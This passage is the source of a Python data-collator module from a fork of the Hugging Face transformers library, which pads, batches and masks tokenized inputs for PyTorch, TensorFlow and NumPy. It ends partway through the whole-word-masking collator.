2018-11-05T21:35:52.000Z
|
2019-07-16T09:51:26.000Z
|
src/transformers/data/data_collator.py
|
ymwangg/transformers
|
4a419d4995111c22d6842ee1bcd2d3f500150845
|
[
"Apache-2.0"
] | 2,106
|
2018-11-05T15:29:15.000Z
|
2019-07-16T08:51:57.000Z
|
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import warnings
from collections.abc import Mapping
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, NewType, Optional, Tuple, Union
from ..models.bert import BertTokenizer, BertTokenizerFast
from ..tokenization_utils_base import PreTrainedTokenizerBase
from ..utils import PaddingStrategy
InputDataClass = NewType("InputDataClass", Any)
"""
A DataCollator is a function that takes a list of samples from a Dataset and collate them into a batch, as a dictionary
of PyTorch/TensorFlow tensors or NumPy arrays.
"""
DataCollator = NewType("DataCollator", Callable[[List[InputDataClass]], Dict[str, Any]])
class DataCollatorMixin:
def __call__(self, features, return_tensors=None):
if return_tensors is None:
return_tensors = self.return_tensors
if return_tensors == "tf":
return self.tf_call(features)
elif return_tensors == "pt":
return self.torch_call(features)
elif return_tensors == "np":
return self.numpy_call(features)
else:
raise ValueError(f"Framework '{return_tensors}' not recognized!")
def default_data_collator(features: List[InputDataClass], return_tensors="pt") -> Dict[str, Any]:
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
to the model. See glue and ner for example of how it's useful.
"""
# In this function we'll make the assumption that all `features` in the batch
# have the same attributes.
# So we will look at the first element as a proxy for what attributes exist
# on the whole batch.
if return_tensors == "pt":
return torch_default_data_collator(features)
elif return_tensors == "tf":
return tf_default_data_collator(features)
elif return_tensors == "np":
return numpy_default_data_collator(features)
@dataclass
class DefaultDataCollator(DataCollatorMixin):
"""
Very simple data collator that simply collates batches of dict-like objects and performs special handling for
potential keys named:
- `label`: handles a single value (int or float) per object
- `label_ids`: handles a list of values per object
Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs
to the model. See glue and ner for example of how it's useful.
This is an object (like other data collators) rather than a pure function like default_data_collator. This can be
helpful if you need to set a return_tensors value at initialization.
Args:
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]], return_tensors=None) -> Dict[str, Any]:
if return_tensors is None:
return_tensors = self.return_tensors
return default_data_collator(features, return_tensors)
def torch_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import torch
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if type(first["label_ids"][0]) is int else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
else:
batch[k] = torch.tensor([f[k] for f in features])
return batch
def tf_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
import tensorflow as tf
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label_col_name = "label"
elif "label_ids" in first and first["label_ids"] is not None:
label_col_name = "label_ids"
elif "labels" in first and first["labels"] is not None:
label_col_name = "labels"
else:
label_col_name = None
if label_col_name is not None:
if isinstance(first[label_col_name], tf.Tensor):
dtype = tf.int64 if first[label_col_name].dtype.is_integer() else tf.float32
elif isinstance(first[label_col_name], np.ndarray) or isinstance(first[label_col_name], np.generic):
dtype = tf.int64 if np.issubdtype(first[label_col_name].dtype, np.integer) else tf.float32
elif isinstance(first[label_col_name], (tuple, list)):
dtype = tf.int64 if isinstance(first[label_col_name][0], int) else tf.float32
else:
dtype = tf.int64 if isinstance(first[label_col_name], int) else tf.float32
batch["labels"] = tf.convert_to_tensor([f[label_col_name] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids", "labels") and v is not None and not isinstance(v, str):
if isinstance(v, (tf.Tensor, np.ndarray)):
batch[k] = tf.stack([f[k] for f in features])
else:
batch[k] = tf.convert_to_tensor([f[k] for f in features])
return batch
def numpy_default_data_collator(features: List[InputDataClass]) -> Dict[str, Any]:
import numpy as np
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], np.ndarray) else first["label"]
dtype = np.int64 if isinstance(label, int) else np.float32
batch["labels"] = np.array([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], np.ndarray):
batch["labels"] = np.stack([f["label_ids"] for f in features])
else:
dtype = np.int64 if type(first["label_ids"][0]) is int else np.float32
batch["labels"] = np.array([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, np.ndarray):
batch[k] = np.stack([f[k] for f in features])
else:
batch[k] = np.array([f[k] for f in features])
return batch
@dataclass
class DataCollatorWithPadding:
"""
Data collator that will dynamically pad the inputs received.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'` (default): Pad to the longest sequence in the batch (or no padding if only a single
sequence is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'`: No padding (i.e., can output a batch with sequences of different lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
return_tensors: str = "pt"
def __call__(self, features: List[Dict[str, Any]]) -> Dict[str, Any]:
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=self.return_tensors,
)
if "label" in batch:
batch["labels"] = batch["label"]
del batch["label"]
if "label_ids" in batch:
batch["labels"] = batch["label_ids"]
del batch["label_ids"]
return batch
@dataclass
class DataCollatorForTokenClassification(DataCollatorMixin):
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignore by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def torch_call(self, features):
import torch
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="pt" if labels is None else None,
)
if labels is None:
return batch
sequence_length = torch.tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch[label_name] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch[label_name] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: torch.tensor(v, dtype=torch.int64) for k, v in batch.items()}
return batch
def tf_call(self, features):
import tensorflow as tf
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="tf" if labels is None else None,
)
if labels is None:
return batch
sequence_length = tf.convert_to_tensor(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: tf.convert_to_tensor(v, dtype=tf.int64) for k, v in batch.items()}
return batch
def numpy_call(self, features):
import numpy as np
label_name = "label" if "label" in features[0].keys() else "labels"
labels = [feature[label_name] for feature in features] if label_name in features[0].keys() else None
batch = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
# Conversion to tensors will fail if we have labels as they are not of the same length yet.
return_tensors="np" if labels is None else None,
)
if labels is None:
return batch
sequence_length = np.array(batch["input_ids"]).shape[1]
padding_side = self.tokenizer.padding_side
if padding_side == "right":
batch["labels"] = [
list(label) + [self.label_pad_token_id] * (sequence_length - len(label)) for label in labels
]
else:
batch["labels"] = [
[self.label_pad_token_id] * (sequence_length - len(label)) + list(label) for label in labels
]
batch = {k: np.array(v, dtype=np.int64) for k, v in batch.items()}
return batch
def _torch_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
import numpy as np
import torch
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple, np.ndarray)):
examples = [torch.tensor(e, dtype=torch.long) for e in examples]
length_of_first = examples[0].size(0)
# Check if padding is necessary.
are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return torch.stack(examples, dim=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(x.size(0) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
def _tf_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
import numpy as np
import tensorflow as tf
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [tf.convert_to_tensor(e, dtype=tf.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return tf.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
# result = examples[0].new_full([len(examples), max_length], tokenizer.pad_token_id)
result = []
rank = tf.rank(examples[0])
paddings = np.zeros((rank, 2), dtype=np.int32)
for example in examples:
if tokenizer.padding_side == "right":
paddings[0, 1] = max_length - len(example)
else:
paddings[0, 0] = max_length - len(example)
result.append(tf.pad(example, paddings, constant_values=tokenizer.pad_token_id))
return tf.stack(result, axis=0)
def _numpy_collate_batch(examples, tokenizer, pad_to_multiple_of: Optional[int] = None):
import numpy as np
"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""
# Tensorize if necessary.
if isinstance(examples[0], (list, tuple)):
examples = [np.array(e, dtype=np.int64) for e in examples]
# Check if padding is necessary.
length_of_first = len(examples[0])
are_tensors_same_length = all(len(x) == length_of_first for x in examples)
if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):
return np.stack(examples, axis=0)
# If yes, check if we have a `pad_token`.
if tokenizer._pad_token is None:
raise ValueError(
"You are attempting to pad samples but the tokenizer you are using"
f" ({tokenizer.__class__.__name__}) does not have a pad token."
)
# Creating the full tensor and filling it with our data.
max_length = max(len(x) for x in examples)
if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
result = np.full(shape=(len(examples), max_length), fill_value=tokenizer.pad_token_id, dtype=examples[0].dtype)
for i, example in enumerate(examples):
if tokenizer.padding_side == "right":
result[i, : example.shape[0]] = example
else:
result[i, -example.shape[0] :] = example
return result
def tolist(x):
if isinstance(x, list):
return x
elif hasattr(x, "numpy"): # Checks for TF tensors without needing the import
x = x.numpy()
return x.tolist()
@dataclass
class DataCollatorForSeq2Seq:
"""
Data collator that will dynamically pad the inputs received, as well as the labels.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
model ([`PreTrainedModel`]):
The model that is being trained. If set and has the *prepare_decoder_input_ids_from_labels*, use it to
prepare the *decoder_input_ids*
This is useful when using *label_smoothing* to avoid calculating loss twice.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`):
Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
among:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence
is provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
max_length (`int`, *optional*):
Maximum length of the returned list and optionally padding length (see above).
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
7.5 (Volta).
label_pad_token_id (`int`, *optional*, defaults to -100):
The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
"""
tokenizer: PreTrainedTokenizerBase
model: Optional[Any] = None
padding: Union[bool, str, PaddingStrategy] = True
max_length: Optional[int] = None
pad_to_multiple_of: Optional[int] = None
label_pad_token_id: int = -100
return_tensors: str = "pt"
def __call__(self, features, return_tensors=None):
import numpy as np
if return_tensors is None:
return_tensors = self.return_tensors
labels = [feature["labels"] for feature in features] if "labels" in features[0].keys() else None
# We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the
# same length to return tensors.
if labels is not None:
max_label_length = max(len(l) for l in labels)
if self.pad_to_multiple_of is not None:
max_label_length = (
(max_label_length + self.pad_to_multiple_of - 1)
// self.pad_to_multiple_of
* self.pad_to_multiple_of
)
padding_side = self.tokenizer.padding_side
for feature in features:
remainder = [self.label_pad_token_id] * (max_label_length - len(feature["labels"]))
if isinstance(feature["labels"], list):
feature["labels"] = (
feature["labels"] + remainder if padding_side == "right" else remainder + feature["labels"]
)
elif padding_side == "right":
feature["labels"] = np.concatenate([feature["labels"], remainder]).astype(np.int64)
else:
feature["labels"] = np.concatenate([remainder, feature["labels"]]).astype(np.int64)
features = self.tokenizer.pad(
features,
padding=self.padding,
max_length=self.max_length,
pad_to_multiple_of=self.pad_to_multiple_of,
return_tensors=return_tensors,
)
# prepare decoder_input_ids
if (
labels is not None
and self.model is not None
and hasattr(self.model, "prepare_decoder_input_ids_from_labels")
):
decoder_input_ids = self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])
features["decoder_input_ids"] = decoder_input_ids
return features
@dataclass
class DataCollatorForLanguageModeling(DataCollatorMixin):
"""
Data collator used for language modeling. Inputs are dynamically padded to the maximum length of a batch if they
are not all of the same length.
Args:
tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
The tokenizer used for encoding the data.
mlm (`bool`, *optional*, defaults to `True`):
Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs
with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for non-masked
tokens and the value to predict for the masked token.
mlm_probability (`float`, *optional*, defaults to 0.15):
The probability with which to (randomly) mask tokens in the input, when `mlm` is set to `True`.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value.
return_tensors (`str`):
The type of Tensor to return. Allowable values are "np", "pt" and "tf".
<Tip>
For best performance, this data collator should be used with a dataset having items that are dictionaries or
BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a
[`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`.
</Tip>"""
tokenizer: PreTrainedTokenizerBase
mlm: bool = True
mlm_probability: float = 0.15
pad_to_multiple_of: Optional[int] = None
tf_experimental_compile: bool = False
return_tensors: str = "pt"
def __post_init__(self):
if self.mlm and self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. "
"You should pass `mlm=False` to train on causal language modeling instead."
)
if self.tf_experimental_compile:
import tensorflow as tf
self.tf_mask_tokens = tf.function(self.tf_mask_tokens, jit_compile=True)
@staticmethod
def tf_bernoulli(shape, probability):
import tensorflow as tf
prob_matrix = tf.fill(shape, probability)
return tf.cast(prob_matrix - tf.random.uniform(shape, 0, 1) >= 0, tf.bool)
def tf_mask_tokens(
self, inputs: Any, vocab_size, mask_token_id, special_tokens_mask: Optional[Any] = None
) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
# 1 for a special token, 0 for a normal token in the special tokens mask
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
masked_indices = self.tf_bernoulli(input_shape, self.mlm_probability) & ~special_tokens_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, mask_token_id, inputs)
# 10% of the time, we replace masked input tokens with random word
indices_random = self.tf_bernoulli(input_shape, 0.1) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=vocab_size, dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import tensorflow as tf
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="tf", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _tf_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in batch["input_ids"].numpy().tolist()
]
# Cannot directly create as bool
special_tokens_mask = tf.cast(tf.convert_to_tensor(special_tokens_mask, dtype=tf.int64), tf.bool)
else:
special_tokens_mask = tf.cast(special_tokens_mask, tf.bool)
batch["input_ids"], batch["labels"] = self.tf_mask_tokens(
tf.cast(batch["input_ids"], tf.int64),
special_tokens_mask=special_tokens_mask,
mask_token_id=self.tokenizer.mask_token_id,
vocab_size=len(self.tokenizer),
)
else:
labels = batch["input_ids"]
if self.tokenizer.pad_token_id is not None:
# Replace self.tokenizer.pad_token_id with -100
labels = tf.where(labels == self.tokenizer.pad_token_id, -100, labels)
else:
labels = tf.identity(labels) # Makes a copy, just in case
batch["labels"] = labels
return batch
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="pt", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _torch_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.torch_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = batch["input_ids"].clone()
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def torch_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import torch
labels = inputs.clone()
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
else:
special_tokens_mask = special_tokens_mask.bool()
probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import numpy as np
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="np", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _numpy_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.numpy_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = np.copy(batch["input_ids"])
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def numpy_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import numpy as np
labels = np.copy(inputs)
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = np.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = np.array(special_tokens_mask, dtype=np.bool)
else:
special_tokens_mask = special_tokens_mask.astype(np.bool)
probability_matrix[special_tokens_mask] = 0
# Numpy doesn't have bernoulli, so we use a binomial with 1 trial
masked_indices = np.random.binomial(1, probability_matrix, size=probability_matrix.shape).astype(np.bool)
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(np.bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.mask_token_id
# 10% of the time, we replace masked input tokens with random word
# indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
indices_random = (
np.random.binomial(1, 0.5, size=labels.shape).astype(np.bool) & masked_indices & ~indices_replaced
)
random_words = np.random.randint(
low=0, high=len(self.tokenizer), size=np.count_nonzero(indices_random), dtype=np.int64
)
inputs[indices_random] = random_words
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
@dataclass
class DataCollatorForWholeWordMask(DataCollatorForLanguageModeling):
"""
Data collator used for language modeling that masks entire words.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for masked language modeling
<Tip>
This collator relies on details of the implementation of subword tokenization by [`BertTokenizer`], specifically
that subword tokens are prefixed with *##*. For tokenizers that do not adhere to this scheme, this collator will
produce an output that is roughly equivalent to [`.DataCollatorForLanguageModeling`].
</Tip>"""
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _torch_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
# For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _torch_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.torch_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _tf_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
# For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _tf_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.tf_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _numpy_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
